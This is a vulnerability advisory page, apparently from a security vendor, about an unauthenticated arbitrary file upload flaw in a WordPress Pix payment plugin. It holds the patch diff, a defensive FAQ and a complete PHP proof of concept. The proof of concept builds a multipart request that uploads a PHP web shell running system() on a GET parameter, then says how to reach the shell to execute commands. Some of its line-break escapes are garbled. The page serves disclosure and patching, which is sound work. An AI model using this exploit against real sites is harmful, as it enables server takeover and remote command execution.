- 'block_title' => esc_attr__('Certificate .crt', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Upload the .crt certificate file for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Certificate .crt', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Upload the .crt certificate file for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
),
'certificate_key_path' => array(
- 'title' => esc_attr__('Certificate .key File', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Certificate .key File', 'lkn-payment-pix-for-woocommerce'),
'type' => 'file',
- 'description' => esc_attr__('Upload your .key certificate file.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Upload your .key certificate file.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Certificate .key', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Upload the .key certificate file for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Certificate .key', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Upload the .key certificate file for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'certificate_crt_path'
),
'additional_resources' => array(
- 'title' => esc_attr__('Additional Resources', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Additional Resources', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'pix_expiration_minutes' => array(
- 'title' => esc_attr__('Expiration option', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Expiration option', 'lkn-payment-pix-for-woocommerce'),
'type' => 'number',
- 'description' => esc_attr__('Set the expiration time for Pix payment.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Set the expiration time for Pix payment.', 'lkn-payment-pix-for-woocommerce'),
'default' => 1440, // 24 horas em minutos
'desc_tip' => true,
'custom_attributes' => array(
'min' => 1
),
- 'block_title' => esc_attr__('Pix Expiration Time (minutes)', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Set how long Pix payment is valid.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Expiration time for Pix payment in minutes. For example, 1440 minutes is equivalent to 1 day (24 hours). Adjust this value according to your business needs.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Pix Expiration Time (minutes)', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Set how long Pix payment is valid.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Expiration time for Pix payment in minutes. For example, 1440 minutes is equivalent to 1 day (24 hours). Adjust this value according to your business needs.', 'lkn-payment-pix-for-woocommerce'),
),
'generate_pix_after_expiration' => array(
- 'title' => esc_attr__('Generate Pix After Expiration', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Generate Pix After Expiration', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Enable to generate a new Pix payment when the order status changes from cancelled or failed back to pending.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Enable this option to automatically generate a new Pix payment if the order returns to pending after being cancelled or failed.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Enable to generate a new Pix payment when the order status changes from cancelled or failed back to pending.', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Enable this option to automatically generate a new Pix payment if the order returns to pending after being cancelled or failed.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => 'no',
- 'block_title' => esc_attr__('Generate Pix After Expiration', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Automatically generate Pix for returned orders.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Generate a new Pix payment if the order returns to pending.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Generate Pix After Expiration', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Automatically generate Pix for returned orders.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Generate a new Pix payment if the order returns to pending.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'pix_expiration_minutes',
),
'generate_pix_button' => array(
- 'title' => esc_attr__('Enable Pix Button on Checkout', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Enable Pix Button on Checkout', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Show Pix payment button during checkout', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Enable this option to display the Pix payment button on the checkout page for customers.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Show Pix payment button during checkout', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Enable this option to display the Pix payment button on the checkout page for customers.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => 'yes',
- 'block_title' => esc_attr__('Pix Button on Checkout', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Show Pix payment button for customers.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Show Pix payment button on the checkout page.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Pix Button on Checkout', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Show Pix payment button for customers.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Show Pix payment button on the checkout page.', 'lkn-payment-pix-for-woocommerce'),
),
'hidde_paid_pix' => array(
- 'title' => esc_attr__('Hide Pix after payment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Hide Pix after payment', 'lkn-payment-pix-for-woocommerce'),
+ 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
'desc_tip' => true,
- 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
- 'block_title' => esc_attr__('Hide Pix QRCode', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Hide Pix QRCode for completed or processing orders.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Hide Pix QRCode for customers with completed or processing orders.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Hide Pix QRCode', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Hide Pix QRCode for completed or processing orders.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Hide Pix QRCode for customers with completed or processing orders.', 'lkn-payment-pix-for-woocommerce'),
),
'developer' => array(
- 'title' => esc_attr__('Developer', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Developer', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'debug' => array(
- 'title' => esc_attr__('Debug', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Debug', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Enable debug logs.', 'gateway-de-pagamento-pix-para-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">' . __('See logs', 'gateway-de-pagamento-pix-para-woocommerce') . '</a>'),
- 'description' => esc_attr__('Enable this option to log Pix payment events for troubleshooting.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Enable debug logs.', 'lkn-payment-pix-for-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">' . __('See logs', 'lkn-payment-pix-for-woocommerce') . '</a>'),
+ 'description' => esc_attr__('Enable this option to log Pix payment events for troubleshooting.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
- 'block_title' => esc_attr__('Debug Mode', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Enable debug logs for troubleshooting.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Enable debug logs for troubleshooting.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Debug Mode', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Enable debug logs for troubleshooting.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Enable debug logs for troubleshooting.', 'lkn-payment-pix-for-woocommerce'),
),
'test_integration' => array(
- 'title' => esc_attr__('Test Integration', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Test Integration', 'lkn-payment-pix-for-woocommerce'),
'type' => 'button',
- 'label' => esc_attr__('Test Integration', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Click to test the integration after saving your settings.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Test Integration', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Click to test the integration after saving your settings.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
- 'block_title' => esc_attr__('Test Integration', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Test your Pix integration after saving.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Test your Pix integration after saving.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Test Integration', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Test your Pix integration after saving.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Test your Pix integration after saving.', 'lkn-payment-pix-for-woocommerce'),
),
);
}
@@ -398,9 +400,12 @@
$client_id = isset($settings['client_id']) ? $settings['client_id'] : '';
$client_secret = isset($settings['client_secret']) ? $settings['client_secret'] : '';
- // Get certificate paths
- $crt_path = !empty($settings['certificate_crt_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_crt_path'] : '';
- $key_path = !empty($settings['certificate_key_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_key_path'] : '';
+ // SECURITY: Get certificate data from encoded storage in database
+ $crt_content = !empty($settings['certificate_crt_content']) ? $settings['certificate_crt_content'] : '';
+ $key_content = !empty($settings['certificate_key_content']) ? $settings['certificate_key_content'] : '';
+
+ $crt_path = !empty($crt_content) ? $this->create_temp_certificate_file($crt_content, 'crt') : '';
+ $key_path = !empty($key_content) ? $this->create_temp_certificate_file($key_content, 'key') : '';
// Validations
if (empty($pix_key)) {
@@ -409,11 +414,11 @@
if (empty($client_id) || empty($client_secret)) {
throw new Exception('Client ID or Client Secret not configured.');
}
- if (empty($crt_path) || !file_exists($crt_path)) {
- throw new Exception('Certificate .crt file not found: ' . $crt_path);
+ if (empty($crt_content)) {
+ throw new Exception('Certificate .crt not configured or invalid.');
}
- if (empty($key_path) || !file_exists($key_path)) {
- throw new Exception('Certificate .key file not found: ' . $key_path);
+ if (empty($key_content)) {
+ throw new Exception('Certificate .key not configured or invalid.');
}
// Validate CPF/CNPJ
@@ -421,7 +426,7 @@
$cpfCnpjData = $this->validateCpfCnpjType($cpfCnpj);
if (!$cpfCnpjData['valid']) {
- throw new Exception(__('Please enter a valid CPF or CNPJ.', 'gateway-de-pagamento-pix-para-woocommerce'));
+ throw new Exception(__('Please enter a valid CPF or CNPJ.', 'lkn-payment-pix-for-woocommerce'));
}
$order->update_meta_data('_cpf_cnpj_type', $cpfCnpjData['type']);
@@ -438,8 +443,6 @@
// 1. Get Auth Token using static method
$auth_result = LknPaymentPixForWoocommercePixC6Endpoint::get_c6_auth_token(
- $crt_path,
- $key_path,
$client_id,
$client_secret,
$base_url
@@ -654,24 +657,24 @@
$generate_after_exp = isset($settings['generate_pix_after_expiration']) ? $settings['generate_pix_after_expiration'] : 'no';
if ($generate_after_exp === 'yes') {
- $expiredPaymentMsg = __('Pix expired, please refresh the page to update the payment order.', 'gateway-de-pagamento-pix-para-woocommerce');
+ $expiredPaymentMsg = __('Pix expired, please refresh the page to update the payment order.', 'lkn-payment-pix-for-woocommerce');
} else {
- $expiredPaymentMsg = __('Pix expired, please generate a new order.', 'gateway-de-pagamento-pix-para-woocommerce');
+ $expiredPaymentMsg = __('Pix expired, please generate a new order.', 'lkn-payment-pix-for-woocommerce');
}
wp_localize_script(
'payment-pix-for-woo-pix-template',
'phpVarsPix',
array(
- 'nextVerify' => __('Next verification in (Number of attempts:', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'successPayment' => __('Payment confirmed!', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'pixButton' => __('I have already paid the PIX', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'copy' => __('COPY', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'copied' => __('COPIED!', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'shareTitle' => __('Share PIX code', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'shareError' => __('Your browser does not support sharing.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'nextVerify' => __('Next verification in (Number of attempts:', 'lkn-payment-pix-for-woocommerce'),
+ 'successPayment' => __('Payment confirmed!', 'lkn-payment-pix-for-woocommerce'),
+ 'pixButton' => __('I have already paid the PIX', 'lkn-payment-pix-for-woocommerce'),
+ 'copy' => __('COPY', 'lkn-payment-pix-for-woocommerce'),
+ 'copied' => __('COPIED!', 'lkn-payment-pix-for-woocommerce'),
+ 'shareTitle' => __('Share PIX code', 'lkn-payment-pix-for-woocommerce'),
+ 'shareError' => __('Your browser does not support sharing.', 'lkn-payment-pix-for-woocommerce'),
'expiredPayment' => $expiredPaymentMsg,
- 'expiredPaymentDate' => __('Pix expired at:', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'expiredPaymentDate' => __('Pix expired at:', 'lkn-payment-pix-for-woocommerce'),
'apiUrl' => $api_url,
)
);
@@ -682,6 +685,17 @@
$plugin_path = 'invoice-payment-for-woocommerce/wc-invoice-payment.php';
$invoice_plugin_installed = file_exists(WP_PLUGIN_DIR . '/' . $plugin_path);
+ // SECURITY: Generate nonces securely for admin scripts
+ wp_localize_script(
+ 'payment-pix-for-woo-admin-gateway-save-fields',
+ 'pixC6AdminNonces',
+ array(
+ 'save_settings' => wp_create_nonce('lkn_pix_for_woocommerce_c6_settings_nonce'),
+ 'test_integration' => wp_create_nonce('pixforwoo_test_c6_pix_charge'),
+ 'ajax_url' => admin_url('admin-ajax.php')
+ )
+ );
+
wc_get_template(
'pixForWoocommercePaymentAdminFields.php', // nome do template
array(
@@ -699,8 +713,16 @@
public function lkn_pix_for_woocommerce_c6_save_settings()
{
+ // SECURITY: Verify user capabilities before processing
+ if (!current_user_can('manage_woocommerce')) {
+ wp_send_json_error(['message' => 'Insufficient permissions.'], 403);
+ }
+
check_ajax_referer('lkn_pix_for_woocommerce_c6_settings_nonce');
+ // SECURITY: Validate file uploads first
+ $this->validate_certificate_uploads();
+
// The $_POST['settings'] value is sanitized right after decoding below.
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
$settings = isset($_POST['settings']) ? json_decode(wp_unslash($_POST['settings']), true) : [];
@@ -719,66 +741,55 @@
$settings['pix_expiration_minutes'] = max(1, intval($settings['pix_expiration_minutes']));
}
- // Inicializa o WP_Filesystem
- global $wp_filesystem;
- if (empty($wp_filesystem)) {
- require_once(ABSPATH . '/wp-admin/includes/file.php');
- WP_Filesystem();
- }
-
- // Diretório dos certificados
- $base_dir = PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . 'Includes/files/';
- $certs_dir = $base_dir . 'certs_c6/';
+ $has_crt = !empty(sanitize_text_field(wp_unslash($_FILES['certificate_crt_path']['name'] ?? '')));
+ $has_key = !empty(sanitize_text_field(wp_unslash($_FILES['certificate_key_path']['name'] ?? '')));
- if (!$wp_filesystem->is_dir($base_dir)) {
- $wp_filesystem->mkdir($base_dir, FS_CHMOD_DIR);
- }
- if (!$wp_filesystem->is_dir($certs_dir)) {
- $wp_filesystem->mkdir($certs_dir, FS_CHMOD_DIR);
- }
-
- $has_crt = !empty($_FILES['certificate_crt_path']['name']);
- $has_key = !empty($_FILES['certificate_key_path']['name']);
-
- if ($has_crt || $has_key) {
- $this->lkn_clear_cert_folder($certs_dir);
- }
-
- // Processa o upload do arquivo .crt
+ // Process .crt file upload and convert to encoded format
if ($has_crt) {
- $crt_filename = isset($_FILES['certificate_crt_path']['name']) ? sanitize_file_name($_FILES['certificate_crt_path']['name']) : '';
- $crt_target = $certs_dir . $crt_filename;
-
- $tmp_file = isset($_FILES['certificate_crt_path']['tmp_name']) ? sanitize_text_field($_FILES['certificate_crt_path']['tmp_name']) : '';
+ $crt_filename = isset($_FILES['certificate_crt_path']['name']) ? sanitize_file_name(wp_unslash($_FILES['certificate_crt_path']['name'])) : '';
+ $tmp_file = isset($_FILES['certificate_crt_path']['tmp_name']) ? sanitize_text_field(wp_unslash($_FILES['certificate_crt_path']['tmp_name'])) : '';
+
if (is_uploaded_file($tmp_file)) {
- $wp_filesystem->copy($tmp_file, $crt_target, true);
- $settings['certificate_crt_path'] = 'Includes/files/certs_c6/' . $crt_filename;
+ $file_content = file_get_contents($tmp_file);
+ if ($file_content !== false) {
+ $settings['certificate_crt_content'] = base64_encode($file_content);
+ $settings['certificate_crt_filename'] = $crt_filename;
+ } else {
+ wp_send_json_error(['message' => 'Failed to read .crt certificate file.']);
+ }
} else {
wp_send_json_error(['message' => 'Failed to upload .crt certificate file.']);
}
}
- // Processa o upload do arquivo .key
+ // Process .key file upload and convert to encoded format
if ($has_key) {
- $key_filename = isset($_FILES['certificate_key_path']['name']) ? sanitize_file_name($_FILES['certificate_key_path']['name']) : '';
- $key_target = $certs_dir . $key_filename;
-
- $tmp_file = isset($_FILES['certificate_key_path']['tmp_name']) ? sanitize_text_field($_FILES['certificate_key_path']['tmp_name']) : '';
+ $key_filename = isset($_FILES['certificate_key_path']['name']) ? sanitize_file_name(wp_unslash($_FILES['certificate_key_path']['name'])) : '';
+ $tmp_file = isset($_FILES['certificate_key_path']['tmp_name']) ? sanitize_text_field(wp_unslash($_FILES['certificate_key_path']['tmp_name'])) : '';
+
if (is_uploaded_file($tmp_file)) {
- $wp_filesystem->copy($tmp_file, $key_target, true);
- $settings['certificate_key_path'] = 'Includes/files/certs_c6/' . $key_filename;
+ $file_content = file_get_contents($tmp_file);
+ if ($file_content !== false) {
+ $settings['certificate_key_content'] = base64_encode($file_content);
+ $settings['certificate_key_filename'] = $key_filename;
+ } else {
+ wp_send_json_error(['meProof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3891 - Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload
<?php
$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
// Create a temporary PHP web shell file
$php_shell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
$shell_filename = 'shell_' . bin2hex(random_bytes(4)) . '.php';
// Build multipart form data for the vulnerable endpoint
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$payload = "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="action"rnrn";
$payload .= "lkn_pix_for_woocommerce_c6_save_settingsrn";
// The vulnerable endpoint expects certificate files and other settings
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="certificate_crt_path"rnrn";
$payload .= "uploads/" . $shell_filename . "rn";
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="certificate_key_path"rnrn";
$payload .= "uploads/key.pemrn";
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="environment"rnrn";
$payload .= "sandboxrn";
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="client_id"rnrn";
$payload .= "test_clientrn";
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="client_secret"rnrn";
$payload .= "test_secretrn";
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="pix_key"rnrn";
$payload .= "test_pix_keyrn";
// Add the malicious file upload
$payload .= "--$boundaryrn";
$payload .= "Content-Disposition: form-data; name="certificate_crt"; filename="" . $shell_filename . ""rn";
$payload .= "Content-Type: application/x-phprnrn";
$payload .= $php_shell . "rn";
$payload .= "--$boundary--rn";
// Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type: multipart/form-data; boundary=$boundary",
"X-Requested-With: XMLHttpRequest"
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check if upload was successful
if ($http_code == 200) {
echo "Exploit attempt completed. HTTP $http_coden";
echo "Response: " . substr($response, 0, 500) . "n";
echo "Shell would be uploaded to: /wp-content/uploads/" . $shell_filename . "n";
echo "Access via: http://vulnerable-site.com/wp-content/uploads/" . $shell_filename . "?cmd=idn";
} else {
echo "Exploit failed. HTTP $http_coden";
echo "Response: " . $response . "n";
}
?>Frequently Asked Questions
What is CVE-2026-3891?
Understanding the vulnerabilityCVE-2026-3891 is a critical vulnerability in the Pix for WooCommerce plugin for WordPress, allowing unauthenticated users to upload arbitrary files to the server. This is due to missing capability checks and file type validation in the ‘lkn_pix_for_woocommerce_c6_save_settings’ function.
How does the vulnerability work?
Mechanics of the exploitThe vulnerability allows attackers to send a POST request to the AJAX endpoint without authentication, which can include malicious files. The plugin does not verify user permissions or validate the file types, leading to potential remote code execution.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the Pix for WooCommerce plugin version 1.5.0 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they are at risk.
How can I check if my site is vulnerable?
Verifying plugin versionTo check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the Pix for WooCommerce plugin and verify if the version is 1.5.0 or earlier.
What should I do if my site is vulnerable?
Immediate actions to takeIf your site is vulnerable, you should immediately update the Pix for WooCommerce plugin to version 1.6.0 or later, which includes a patch for this vulnerability. Regularly updating all plugins is a best practice for security.
What does the CVSS score of 9.8 indicate?
Understanding the severityThe CVSS score of 9.8 signifies that this vulnerability is critical and poses a high risk to affected systems. It indicates that exploitation could lead to severe consequences, including unauthorized access and potential remote code execution.
What is the practical risk of this vulnerability?
Consequences of exploitationThe practical risk includes the potential for attackers to upload malicious files, which could lead to full server compromise. If an attacker successfully uploads a web shell, they could execute commands on the server, compromising the entire site.
How does the proof of concept demonstrate the vulnerability?
Example of exploitationThe proof of concept outlines a method for exploiting the vulnerability by crafting a malicious POST request to the vulnerable AJAX endpoint. It illustrates how an attacker can upload a PHP web shell to the server, which could then be used to execute arbitrary commands.
What are the recommended mitigation strategies?
Preventive measuresIn addition to updating the plugin, administrators should implement security measures such as limiting file upload capabilities and using web application firewalls. Regular security audits and monitoring for unusual activity are also recommended.
Where can I find more information about CVE-2026-3891?
Further resourcesMore information about CVE-2026-3891 can be found on the National Vulnerability Database (NVD) or security advisories related to the Pix for WooCommerce plugin. Keeping abreast of security updates from plugin developers is also crucial.
What should I do if I cannot update the plugin immediately?
Short-term measuresIf immediate updates are not possible, consider disabling the plugin until a secure version can be installed. Additionally, review server logs for any unauthorized access attempts and strengthen server security configurations.
How can I ensure my WordPress site remains secure?
Long-term security practicesTo maintain security, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and conduct routine security scans. Consider employing security plugins that monitor for vulnerabilities and provide alerts.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
